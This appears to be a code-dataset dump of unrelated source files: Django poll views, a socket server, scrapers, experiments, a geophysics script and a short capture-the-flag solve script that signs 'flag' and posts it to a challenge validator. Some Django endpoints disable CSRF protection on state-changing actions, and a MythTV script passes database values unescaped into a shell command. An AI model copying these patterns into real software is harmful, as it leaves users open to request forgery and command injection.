from_email=from_email,\n # to_email=to_email\n # )\n \n return JsonResponse({\"result\": result })\n\n else:\n return redirect('/')\n\n\n\n\n\n#counting the number of views when a poll has when dropdown is clicked on\n@csrf_exempt # ok to exempt no input\ndef api_vcount(request):\n\n if request.POST:\n if request.user.is_authenticated:\n poll_id = request.POST.get('poll_id')\n\n pobj = PollItem.objects.get(id=poll_id)\n\n if pobj.user_submit != request.user:\n view_obj = ViewPollItemsUnique.objects.get_or_create(p_item=pobj)[0]\n view_obj.userview.add(request.user)\n view_obj.vcount = view_obj.userview.count()\n view_obj.save()\n\n result = \"success\"\n\n return JsonResponse({\"result\": result})\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_like(request):\n # msg_id = request.POST.get('msg_id')\n\n if request.POST:\n if request.user.is_authenticated:\n\n msg_id = request.POST.get('msg_id')\n # poll_id = request.POST.get('poll_id')\n # pollitem_obj = PollItem.objects.get(id=poll_id)\n\n # exit if the 
user who liked it is the same as the user who posted the message\n poll_submit_user = Message.objects.get(id=msg_id).senduser\n if poll_submit_user == request.user:\n return redirect('/')\n\n\n msg_obj = Message.objects.filter(id=msg_id, userlikes=request.user)\n\n if msg_obj:\n # remove like\n msg_obj.first().userlikes.remove(request.user)\n result = \"unliked\"\n else:\n # add like\n like = Message.objects.get(id=msg_id)\n like.userlikes.add(request.user)\n result = \"liked\"\n\n try:\n msg = Message.objects.get(id=msg_id)\n msg.calc_likes()\n likecount = msg.likes\n except:\n likecount = 0\n\n # return JsonResponse({\"result\": result})\n return JsonResponse({\"result\": result, \"resultc\": likecount })\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_fav(request):\n\n if request.POST:\n if request.user.is_authenticated:\n poll_id = request.POST.get('poll_id')\n pollitem_obj = PollItem.objects.get(id=poll_id)\n poll_fav = PollFav.objects.filter(poll=pollitem_obj, fav_user=request.user)\n\n if poll_fav:\n # remove favorite\n poll_fav.first().poll.remove(pollitem_obj)\n result = \"unfavorited\"\n # messages.info(request, \"Unfavorited!\")\n\n else:\n # add favorite\n fav = PollFav.objects.get_or_create(fav_user=request.user)[0]\n fav.save()\n fav.poll.add(pollitem_obj)\n result = \"favorited\"\n # messages.info(request, \"Favorited!\")\n\n return JsonResponse({\"result\": result})\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n# this is no longer being used\n# add poll to favorite:\ndef favorite_poll(request, pk):\n pollitem_obj = PollItem.objects.get(id=pk)\n poll_fav = PollFav.objects.filter(poll=pollitem_obj, fav_user=request.user)\n\n if poll_fav:\n # remove favorite\n poll_fav.first().poll.remove(pollitem_obj)\n messages.info(request, \"Unfavorited!\")\n\n else:\n # add favorite\n fav = PollFav.objects.get_or_create(fav_user=request.user)[0]\n fav.save()\n fav.poll.add(pollitem_obj)\n messages.info(request, \"Favorited!\")\n\n favorite = request.POST.get(\"favorite\", None)\n if favorite:\n return redirect('/polls/favorite_list/?favorite=' + favorite)\n else:\n return redirect('/polls/' + str(pk))\n\n\n@csrf_exempt # ok to exempt no input\ndef api_votes(request):\n\n if request.POST:\n\n if request.user.is_authenticated:\n\n # #if no longer the same year implement this in the new year to close off the year\n # todateyear = datetime.today().year\n # type_id = request.session.get(\"type_id\")\n # pollyear = get_object_or_404(Ptype, id=type_id).year\n # if str(todateyear) != str(pollyear):\n # messages.info(request, \"The voting for this poll has ended\")\n\n #redirect user if he is banned\n user = request.user\n userban = PUser.objects.get(user=user)\n if userban.banned == True:\n messages.info(request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n\n poll_id = request.POST.get('poll_id')\n poll = PollItem.objects.get(id=poll_id)\n\n if poll.user_submit == user:\n #user cannot vote for a post that he has created\n return redirect('/')\n else:\n pass\n\n #updating the vote count for the poll\n vote_obj = PollVoting.objects.get_or_create(vote_user=request.user, poll=poll)[0]\n\n if request.POST.get('posi') == \"true\":\n if vote_obj.vote == 1:\n vote_obj.vote = 0\n else:\n vote_obj.vote = 1\n\n if request.POST.get('nega') == \"true\":\n if 
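`api_fav` above toggles a many-to-many membership on a per-user `PollFav` row. The toggle in isolation, as a hedged sketch assuming the `fav_user`/`poll` field names shown above:

```python
def toggle_favorite(PollFav, user, poll_item):
    """Add the item to the user's favorites, or remove it if already present."""
    fav, _created = PollFav.objects.get_or_create(fav_user=user)
    if fav.poll.filter(pk=poll_item.pk).exists():
        fav.poll.remove(poll_item)
        return "unfavorited"
    fav.poll.add(poll_item)
    return "favorited"
```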
vote_obj.vote == -1:\n vote_obj.vote = 0\n else:\n vote_obj.vote = -1\n\n #exclude poll entries that have been voted down more the number of votes stipulated in the database\n print (poll.score)\n\n #check the number of downvotes a poll should get before removal\n ctable = ControlTable.objects.get(id=1)\n rmvotesno = ctable.removepostdvotes\n\n #poll disallowed or removed\n if poll.score <= -rmvotesno:\n poll.allowed=False\n poll.save()\n\n #remove the notifications (if any) for the poll after it had been removed\n rmvnoti = Notification.objects.filter(pollitem=poll)\n if rmvnoti:\n for k in rmvnoti:\n k.active=False\n k.save()\n\n\n\n vote_obj.save()\n\n #refresh the score of the poll in the database\n poll.calc_score()\n\n #include the below if you need to vote numbers back to the user\n return JsonResponse({\"result\": poll.score, \"resultvote\": vote_obj.vote, \"pvote\": poll.posi})\n # return JsonResponse({\"result\": poll.score})\n\n else:\n return JsonResponse({\"result\": \"error\", \"msg\": \"login_requred\"})\n else:\n return redirect('/')\n\n\n\n\n\n\n","sub_path":"test/src/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":69112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374750614","text":"import socket\nimport threading\nimport os\nimport logging\nfrom receiver import Receiver\nfrom config import Config\n\nclass Connector(threading.Thread):\n socket_listen = None\n non_stop = True\n def __init__(self):\n threading.Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n if Connector.socket_listen is None:\n conf = Config()\n port = conf.config_directory[\"PORT\"]\n try:\n self.listen = socket.socket()\n self.listen.bind((\"0.0.0.0\",int(os.environ.get('PORT',port))))\n except socket.error:\n self.logger.error(\"CREATE ERROR. MAYBE PORT IN USE. 
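The vote handling in `api_votes` above cycles each user's vote among +1, 0 and -1: clicking the same arrow again cancels the vote, and the other arrow flips it. The state transition as a small pure function:

```python
def cycle_vote(current, upvote_clicked, downvote_clicked):
    """Mirror the posi/nega branches above: repeat click cancels, other arrow flips."""
    if upvote_clicked:
        return 0 if current == 1 else 1
    if downvote_clicked:
        return 0 if current == -1 else -1
    return current

assert cycle_vote(1, True, False) == 0    # cancel an existing upvote
assert cycle_vote(1, False, True) == -1   # flip an upvote to a downvote
assert cycle_vote(0, True, False) == 1    # fresh upvote
```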
WILL EXIT.\")\n exit()\n self.logger.info(\"build success!\")\n else:\n self.listen = Connector.socket_listen\n\n def run(self):\n self.listen.listen(15)\n while Connector.non_stop:\n c, addr = self.listen.accept()\n receiver = Receiver(self.listen,c,addr)\n receiver.start()\n","sub_path":"core/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"241131212","text":"import os\nimport csv\n\n\ndef write_apartments(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.tsv\"\n try:\n with open(filename, mode='a', encoding='UTF-8', newline='') as output_file:\n writer = csv.DictWriter(output_file, delimiter='\\t', fieldnames=data[0].keys())\n if os.stat(filename).st_size == 0:\n writer.writeheader()\n for item in data:\n writer.writerow(item)\n except IOError:\n print('I/O Error')\n\n\ndef write_cadastres(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.csv\"\n try:\n with open(filename, mode='a', encoding='UTF-8', newline='') as output_file:\n writer = csv.writer(output_file, lineterminator='\\n')\n for item in data:\n writer.writerow([item, ])\n except IOError:\n print(\"I/O Error\")\n\n\ndef write_addresses(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.txt\"\n try:\n with open(filename, mode='w', encoding='UTF-8') as output_file:\n output_file.writelines(\"%s\\n\" % item for item in data)\n except IOError as e:\n print(e)\n\n\ndef get_cadastres(dirname, city):\n filename = f\"{dirname}/{city}.csv\"\n data = []\n try:\n with open(filename, mode='r', encoding='UTF-8', newline='') as input_file:\n reader = csv.reader(input_file, lineterminator='\\n')\n for cadastre in reader:\n data.append(cadastre[0])\n except IOError:\n print(\"I/O Error\")\n return data\n\n\ndef get_addresses(dirname, city):\n filename = f\"{dirname}/{city}.txt\"\n data = []\n try:\n with open(filename, mode='r', encoding='UTF-8') as input_file:\n data = [item.rstrip() for item in input_file.readlines()]\n except IOError:\n print(\"I/O Error\")\n return data\n","sub_path":"utils/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229408730","text":"# -*- coding: utf-8 -*-\nimport re\nfrom get_chinese_meaning import get_chinese\nfrom get_sentence import get_sentence\n\n# read the file\n# f_name = input('input the essay file name')\nf_name = 'Untitled.txt'\nwith open(f_name, 'r') as f_read:\n essay_content = f_read.read()\nfilter_essay_list = [i for i in essay_content if i.isalpha() is True or i == ' ']\nfilter_essay = ''.join(filter_essay_list)\nfilter_essay = filter_essay.lower()\nsplit_words = filter_essay.split(' ')\nsplit_words = [i for i in split_words if i != '']\n\n# get already know words\nwith open(\"already_know.txt\", 'r') as already_know:\n already_know = already_know.read()\n# sort out the file\nalready_know = already_know.replace(' ', ',')\nalready_know = already_know.replace(',', '\\n')\nalready_know = already_know.split('\\n')\nalready_know = list(set(already_know)) # remove duplicate words\nalready_know = sorted(already_know)\n\nalready_know_sort = ''\nfor i in already_know:\n already_know_sort += i + '\\n'\nwith open(\"already_know.txt\", 'w') as 
f: # 刷新已知单词文件\n f.write(already_know_sort)\n\n# filter already know words\n# Descending sort list\nfilter_words = [i for i in split_words if i not in already_know]\n\ndic = {}\nfor i in filter_words:\n if i in dic:\n dic[i] += 1\n else:\n dic[i] = 1\n\nsort_dic = sorted(dic.items(), key=lambda x: x[1], reverse=True) # sort the dictionary\n\n# output words and frequency\n# for word, frequency in sort_dic:\n# print(word, frequency)\n\nprint(sort_dic)\nif __name__ == '__main__':\n index = 0\n while index != len(sort_dic):\n print(index + 1, get_chinese(sort_dic[index][0]))\n print('出现次数:' + str(sort_dic[index][1]))\n sentence_list = get_sentence(sort_dic[index][0], essay_content)\n sentence_index = 1\n for i in sentence_list:\n print(\"例句{}\".format(sentence_index), i)\n sentence_index += 1\n if sentence_index == 5:\n break\n print('=' * 40)\n index += 1\n","sub_path":"get_words_frequency.py","file_name":"get_words_frequency.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"303074415","text":"#!/usr/bin/python\r\nimport MySQLdb, os, subprocess\r\n\r\nxmltv = \"/opt/mc2xml/xmltv.xml\"\r\n\r\nvars = dict()\r\n\r\nwith open(os.path.expanduser('~') + \"/.mythtv/mysql.txt\", \"r\") as f:\r\n for line in f:\r\n if not line.startswith('#'):\r\n eq_index = line.find('=')\r\n var_name = line[:eq_index].strip()\r\n var_value = line[eq_index + 1:].strip()\r\n vars[var_name] = var_value\r\n\r\ndb = MySQLdb.connect (host = vars['DBHostName'],\r\n user = vars['DBUserName'],\r\n passwd = vars['DBPassword'],\r\n db = vars['DBName'])\r\n\r\nreader = db.cursor()\r\nupdate = db.cursor()\r\n\r\nreader.execute(\"SELECT callsign FROM channel\")\r\n\r\nfor x in range(0, int(reader.rowcount)):\r\n row = reader.fetchone()\r\n callsign = row[0]\r\n cmd = \"grep -3 \\>\" + callsign + \"\\< \" + xmltv + \" | grep id | cut -f2 -d'\\\"'\"\r\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\r\n (output, err) = p.communicate()\r\n exitcode = p.wait()\r\n r = update.execute(\"\"\"UPDATE mythconverg.channel SET xmltvid = %s WHERE callsign=%s\"\"\", (output.strip(), callsign))\r\n","sub_path":"mythtv/mc2xml/updateChannels.py","file_name":"updateChannels.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"619809849","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass BestMoviesSpider(CrawlSpider):\n name = 'best_movies'\n allowed_domains = ['www.imdb.com']\n start_urls = ['https://www.imdb.com/chart/top/?ref_=nv_mv_250']\n\n rules = (\n Rule(LinkExtractor(\n restrict_xpaths=\"//tbody[@class='lister-list']/tr\"), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n yield {\n 'title': response.xpath(\"//div[@class='TitleBlock__TitleContainer-sc-1nlhx7j-1 jxsVNt']/h1/text()\").get(),\n 'year': response.xpath(\"//div[@class='TitleBlock__TitleMetaDataContainer-sc-1nlhx7j-2 hWHMKr']/ul/li[1]/span/text()\").get(),\n 'duration': response.xpath(\"//div[@class='TitleBlock__TitleMetaDataContainer-sc-1nlhx7j-2 hWHMKr']/ul/li[3]/text()\").get(),\n 'genre': response.xpath(\"//a[@class='GenresAndPlot__GenreChip-cum89p-3 fzmeux ipc-chip ipc-chip--on-baseAlt']/span/text()\").get(),\n 'rating': response.xpath(\"//div[@class='AggregateRatingButton__ContentWrap-sc-1ll29m0-0 hmJkIS']/div/span[1]/text()\").get(),\n 
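`get_words_frequency.py` above builds its frequency table with a hand-rolled dict and a `sorted(...)` call. `collections.Counter` (already used by the word-distribution script later in this file) does both steps in one object:

```python
from collections import Counter

words = ['the', 'cat', 'the', 'mat', 'the']
freq = Counter(words)
print(freq.most_common(2))   # [('the', 3), ('cat', 1)]
```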
'movie_url': response.url,\n }\n","sub_path":"imdb/spiders/best_movies.py","file_name":"best_movies.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"265325053","text":"#https://www.interviewbit.com/problems/max-product-subarray/\nclass Solution:\n # @param A : tuple of integers\n # @return an integer\n def maxProduct(self, A):\n n = len(A)\n max_here = 1\n min_here = 1\n max_all = -float(\"inf\")\n for i in range(n):\n if A[i]>0:\n max_here *=A[i]\n min_here = min(min_here*A[i],1)\n elif A[i]==0:\n max_here = 0\n min_here = 1 \n else:\n temp = max_here\n max_here = min_here*A[i]\n min_here = temp*A[i]\n max_all = max(max_here,max_all)\n if max_here<=0:\n max_here = 1\n return max_all\n \n","sub_path":"DP/max-product-subarray.py","file_name":"max-product-subarray.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"309544349","text":"#Bubble Sort - Runtime of O(n^2)\n\n#!/bin/python3\n\nimport sys\n\n\nn = int(input().strip())\na = [int(a_temp) for a_temp in input().strip().split(' ')]\n\nnumSwaps = 0\n\na = list(map(int, a))\n \nfor j in range(1, n):\n for i in range(1, n):\n if a[i] < a[i-1]:\n a[i], a[i-1] = a[i-1], a[i]\n numSwaps += 1\n \n\n\nprint(\"Array is sorted in \" + str(numSwaps) + \" swaps.\")\nprint(\"First Element: \" + str(a[0]))\nprint(\"Last Element: \" + str(a[-1]))\n\n","sub_path":"30 Days of Code/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"200064124","text":"import rospy\nimport numpy as np\nfrom sawyer.ros.envs.sawyer import ToyEnv\n\nrospy.init_node('test_toy_env')\ntoy_env = ToyEnv(simulated=False, control_mode='task_space')\n\naction = np.array([0.1, 0, 0, 0])\n\ni = 0\nwhile i < 2:\n obs, r, done, info = toy_env.step(action)\n print(obs) \n print(r)\n print(done)\n print(info)\n i += 1\n\ntoy_env.reset()\n","sub_path":"sawyer/ros/tests/test_toy_env.py","file_name":"test_toy_env.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"139210374","text":"import psychopy\r\nimport psychopy.gui\r\nimport xlrd\r\nimport random\r\nfrom random import randint\r\nfrom psychopy import core, visual, data, event, logging, clock\r\n# instructions experimental block of reward condition (soothe the baby)\r\nINSTRUCTIONS_REWARD_EXP = \"\"\"\r\n Over the fixation point will be presented a distressed baby face, \r\n your task is to soothe the baby with one of the 2 toys available. \r\n One of the two is more successful and it will make the baby stop crying or being happy! \r\n the other one will not produce any change.\r\n use left and right arrow to select the toy you think is better and try to soothe the baby as much as possible!\r\n Pay attention, the good toy may change!\r\n\r\n Good luck!\r\n\r\n Press 'space' to begin.\r\n \"\"\"\r\n\r\n# instructions experimental block of punishment condition (excite the baby)\r\nINSTRUCTIONS_PUNISHMENT_EXP = \"\"\"\r\n Over the fixation point will be presented a neutral baby face, \r\n your task is to make the baby happy with one of the 2 toys available. \r\n One of the two is more successful and it will make the baby being happy! 
\r\n the other might have no effect or even distress the baby!\r\n use left and right arrow to select the toy you think is better and try to make the baby as much as possible!\r\n Pay attention, the good toy may change!\r\n\r\n Good luck!\r\n\r\n Press 'space' bar to begin.\r\n \"\"\"\r\n\r\nNUM_TRIALS = 200\r\n\r\ndef init_elements_in_window():\r\n window = init_window()\r\n pos_right = [200, -200]\r\n pos_left = [-200, -200]\r\n toy_size = [200, 200]\r\n face_size = [150, 200]\r\n fixationcross_size = [50, 50]\r\n rectangle_right = psychopy.visual.Rect(win=window, units=\"pix\", width=toy_size[0] + 10, height=toy_size[1] + 10,\r\n lineColor='green', colorSpace='rgb', pos=pos_right)\r\n rectangle_left = psychopy.visual.Rect(win=window, units=\"pix\", width=toy_size[0] + 10, height=toy_size[1] + 10,\r\n lineColor='green', colorSpace='rgb', pos=pos_left)\r\n toy_bear = psychopy.visual.ImageStim(win=window, image=\"toy1_bear.png\", color=(1.0, 1.0, 1.0), size=toy_size,\r\n units='pix',\r\n pos=pos_right)\r\n toy_duck = psychopy.visual.ImageStim(win=window, image=\"toy2_duck.png\", color=(1.0, 1.0, 1.0), size=toy_size,\r\n units='pix',\r\n pos=pos_left)\r\n happyface = psychopy.visual.ImageStim(win=window, image=\"babyhappy2.png\", color=(1.0, 1.0, 1.0),\r\n size=face_size,\r\n units='pix', pos=[0, 200])\r\n neutralface = psychopy.visual.ImageStim(win=window, image=\"babyneutral2.png\", color=(1.0, 1.0, 1.0),\r\n size=face_size,\r\n units='pix', pos=[0, 200])\r\n sadface = psychopy.visual.ImageStim(win=window, image=\"babyneg2.png\", color=(1.0, 1.0, 1.0), size=face_size,\r\n units='pix', pos=[0, 200])\r\n fixation_cross = psychopy.visual.ImageStim(win=window, image=\"fixation_cross.png\", color=(1.0, 1.0, 1.0),\r\n size=fixationcross_size, units='pix', pos=[0, 200])\r\n\r\n right_highlight = psychopy.visual.Rect(win=window, pos=pos_right, width=250, height=250, color=(0.0, 1.0, 0.0),\r\n units='pix')\r\n\r\n left_highlight = psychopy.visual.Rect(win=window, pos=pos_left, width=250, height=250, color=(0.0, 1.0, 0.0),\r\n units='pix')\r\n\r\n return window, rectangle_right, rectangle_left, toy_bear, toy_duck, happyface, neutralface, sadface, fixation_cross, right_highlight, left_highlight\r\n\r\n\r\ndef init_window():\r\n screen_size = [1000, 1000]\r\n window = psychopy.visual.Window(\r\n units='pix',\r\n size=screen_size,\r\n fullscr=False,\r\n # change in True when you run the actual experiment and change the screen size into the actual size of the screen of the pc you will use\r\n color=[0, 0, 0])\r\n return window\r\n\r\n\r\ndef show_dialog_and_get_info():\r\n print(\"show_dialog...\")\r\n gui = psychopy.gui.Dlg()\r\n gui.addField(\"Participant Name:\", \"Ilaria\")\r\n gui.addField(\"Condition Number:\", 1)\r\n gui.addField(\"Age:\", 26)\r\n gui.addField(\"Gender(m/f/o):\", \"f\")\r\n # this is a blocking function. as long as the participant has not clicked ok the code progression\r\n # will be blocked here\r\n gui.show()\r\n participant_number = gui.data[0]\r\n cond_num = int(gui.data[1])\r\n age = int(gui.data[2])\r\n gender = (gui.data[3])\r\n return participant_number, cond_num, age, gender\r\n\r\n\r\ndef get_random_instructions(instruction_list):\r\n result = random.choice(instruction_list)\r\n text = result[0]\r\n id = result[1]\r\n print(\"instruction text is %s. 
id is %s\" % (text, id))\r\n return text, id\r\n\r\n\r\ndef show_instructions_and_wait(window):\r\n instruction_list = [(INSTRUCTIONS_REWARD_EXP, True), (INSTRUCTIONS_PUNISHMENT_EXP, False)]\r\n instructions_text, is_reward = get_random_instructions(instruction_list)\r\n text_stim = psychopy.visual.TextStim(\r\n win=window,\r\n text=instructions_text,\r\n color=(-1, -1, -1), height=30.0)\r\n text_stim.draw(window)\r\n window.flip()\r\n psychopy.event.waitKeys(keyList=['space'])\r\n print(\"user pressed space -> go to next step !\")\r\n return is_reward\r\n\r\n\r\ndef experiment_trial(is_reward, window, right_highlight, left_highlight, toy1, toy2, happy_face, neutral_face, sad_face):\r\n print(\"start experiment trial with is_reward=%s...\" % is_reward)\r\n fixation_cross.draw(window)\r\n window.flip()\r\n core.wait(1)\r\n print(\"waited 1 seconds.\")\r\n fixation_cross.draw(window)\r\n window.flip()\r\n core.wait(1)\r\n # remove fixation cross\r\n window.flip()\r\n # right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n window.flip()\r\n\r\n response = psychopy.event.waitKeys(keyList=['left', 'right'])\r\n print(response)\r\n # highlight selected items\r\n pressed_left = None\r\n if 'left' in response:\r\n pressed_left = True\r\n left_highlight.draw(window)\r\n toy2.draw(window)\r\n toy1.draw(window)\r\n if 'right' in response:\r\n pressed_left = False\r\n right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n window.flip()\r\n\r\n # decide what baby face to display to user\r\n process_result_and_wait(window, happy_face, neutral_face, sad_face, pressed_left, left_highlight, right_highlight, toy1, toy2)\r\n\r\n\r\ndef process_result_and_wait(window, happy_face, neutral_face, sad_face, pressed_left, left_highlight, right_highlight, toy1, toy2):\r\n #redraw previous state\r\n if pressed_left:\r\n left_highlight.draw(window)\r\n toy2.draw(window)\r\n toy1.draw(window)\r\n else:\r\n right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n\r\n #decide which baby face to display\r\n random_id = randint(1, 3)\r\n if random_id == 1:\r\n happy_face.draw(window)\r\n if random_id == 2:\r\n neutral_face.draw(window)\r\n if random_id == 3:\r\n sad_face.draw(window)\r\n\r\n window.flip()\r\n core.wait(3)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"start experiment...\")\r\n participant_number, cond_num, age, gender = show_dialog_and_get_info()\r\n print(\"participant name is %s, cond_num is %d, age is %d, gender is %s.\"\r\n % (participant_number, cond_num, age, gender))\r\n\r\n window, rectangle_right, rectangle_left, toy_bear, toy_duck, happy_face, neutral_face, sad_face, fixation_cross, right_highlight, left_highlight = init_elements_in_window()\r\n print(\"windows elements are ready for use.\")\r\n\r\n is_reward = show_instructions_and_wait(window)\r\n\r\n cpt_iteration = 0\r\n while True:\r\n experiment_trial(is_reward, window, right_highlight, left_highlight, toy_bear, toy_duck, happy_face, neutral_face, sad_face)\r\n cpt_iteration += 1\r\n print(\"%d experiment trials has been performed.\" % cpt_iteration)\r\n\r\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"27658987","text":"import requests\nimport ed25519\n\nseed = open(\"key.bin\", \"rb\").read()\nprivKey = ed25519.SigningKey(seed)\n\nmsg = b'flag'\nsignature = privKey.sign(msg)\n\nresp = 
requests.post('https://validator.ecsc22.hack.cert.pl/', json={\n\t\"id\": msg.decode(),\n\t\"signature\": list(signature)\n})\n\nprint(resp.status_code)\nprint(resp.text)\n","sub_path":"ecsc_2022/validator/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337829741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 23 21:33:32 2020\n\n@author: chens\n\"\"\"\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom geoist import gridder\nfrom geoist.inversion import geometry\nfrom geoist.pfm import prism, giutils\nfrom geoist.inversion.mesh import PrismMesh\nfrom geoist.vis import giplt\n\nfname1 = \"D:\\\\projects\\\\model1-2-to-Jin-Chen\\\\rho1.mat\"\n#fname2 = \"D:\\\\projects\\\\model1-2-to-Jin-Chen\\\\rho2.mat\"\ndata1=sio.loadmat(fname1)\n#data2=sio.loadmat(fname2)\nrho10 = data1['data_dens']\n#rho2 = data2['data_dens2']\nrho1 = rho10[::7,::10]\nmaglist = [12.0, 5.0, 2.0, 6.0]\nmag1 = rho1.copy()\n# NOTE: iterating over a set has arbitrary order, so the density-to-magnetization pairing below can differ between runs\nfor i, di in enumerate(set(rho1.ravel())):\n    print(di, maglist[i])\n    mag1[rho1 == di] = maglist[i]\n    \n\nplt.figure()\nplt.imshow(rho1)\n\nplt.figure()\nplt.imshow(mag1)\n#plt.figure()\n#plt.imshow(rho2) #, origin='lower')\n\nmeshfile = r\"d:\\msh1.txt\"\ndensfile = r\"d:\\den1.txt\"\nmagfile = r\"d:\\mag1.txt\"\ngraoutfile = r\"d:\\gra1.dat\"\nmagoutfile = r\"d:\\mag1.dat\"\ngraoutfile1 = r\"d:\\gra1n.dat\"\nmagoutfile1 = r\"d:\\mag1n.dat\"\narea = (-100, 100, -750, 750, 0, 700) #x y z\nshape = (100, 150, 1) # z y x\nmesh = PrismMesh(area, shape)\nmesh.addprop('density', 1000.*rho1.ravel()-2529.99997)\nmesh.addprop('magnetization', mag1.ravel())\nmesh.dump(meshfile, densfile, 'density')\nmesh.dump(meshfile, magfile, 'magnetization') # dump the mesh to disk for visualization in MeshTools3D\n# build the kernel matrix\nkernel=[] \nnarea = (-500, 500,-1000, 1000) #y x\nnshape = (20, 40)\nxp, yp, zp = gridder.regular(narea, nshape, z=-1)\nprisms=[]\nfor p in mesh:\n    prisms.append(p)\nprint('kernel')\ninc, dec = 30, -4\nkernelgz = prism.gz_kernel(xp, yp, zp, prisms)\nfor i, layer in enumerate(mesh.layers()):\n    for j, p in enumerate(layer):\n        x1 = mesh.get_layer(i)[j].x1\n        x2 = mesh.get_layer(i)[j].x2\n        y1 = mesh.get_layer(i)[j].y1\n        y2 = mesh.get_layer(i)[j].y2\n        z1 = mesh.get_layer(i)[j].z1\n        z2 = mesh.get_layer(i)[j].z2\n        den = mesh.get_layer(i)[j].props\n        model=[geometry.Prism(x1, x2, y1, y2, z1, z2, \n                              {'magnetization': giutils.ang2vec(1, inc, dec)})]\n        field = prism.tf(xp, yp, zp, model, inc, dec)\n        kernel.append(field) \n        \nkk=np.transpose(kernel)  #kernel matrix for inversion, 500 cells * 400 points\nfield_mag=np.mat(kk)*np.transpose(np.mat(mag1.ravel()))\nfield_gra=np.mat(kernelgz)*np.transpose(np.mat(rho1.ravel()))\nfield_mag1 = giutils.contaminate(np.array(field_mag).ravel(), 0.05, percent = True)\nfield_gra1 = giutils.contaminate(np.array(field_gra).ravel(), 0.05, percent = True)\n\n# save the forward-modeled anomalies\nwith open(graoutfile, 'w') as f:\n    f.write('! model 1 gravity anomaly (mGal)\\n')\n    f.write('{}\\n'.format(len(field_gra)))\n    for i in range(len(field_gra)):\n        f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_gra[i]).ravel()[0]))\n    \nwith open(magoutfile, 'w') as f:\n    f.write('! model 1 total-field magnetic anomaly (nT)\\n')\n    f.write('{}\\n'.format(len(field_mag)))\n    for i in range(len(field_mag)):\n        f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_mag[i]).ravel()[0]))\n    \nwith open(graoutfile1, 'w') as f:\n    f.write('! model 1 gravity anomaly (mGal) with 5% noise\\n')\n    f.write('{}\\n'.format(len(field_gra1)))\n    for i in range(len(field_gra1)):\n        f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_gra1[i]).ravel()[0]))\n    \nwith open(magoutfile1, 'w') as f:\n    f.write('! model 1 total-field magnetic anomaly (nT) with 5% noise\\n')\n    f.write('{}\\n'.format(len(field_mag1)))\n    for i in range(len(field_mag1)):\n        f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_mag1[i]).ravel()[0]))\n    \n    \n# plotting\nplt.figure(figsize=(16, 16))\nplt.subplot(2, 2, 1)\nplt.axis('scaled')\nplt.title('model 1 gravity anomaly (mGal)')\nlevels = giplt.contourf(yp , xp , field_gra, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_gra, nshape,\n              levels, clabel=False, linewidth=0.1)\nplt.subplot(2, 2, 2)\nplt.axis('scaled')\nplt.title('model 1 total-field magnetic anomaly (nT)')\nlevels = giplt.contourf(yp , xp , field_mag, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_mag, nshape,\n              levels, clabel=False, linewidth=0.1)\n\nplt.subplot(2, 2, 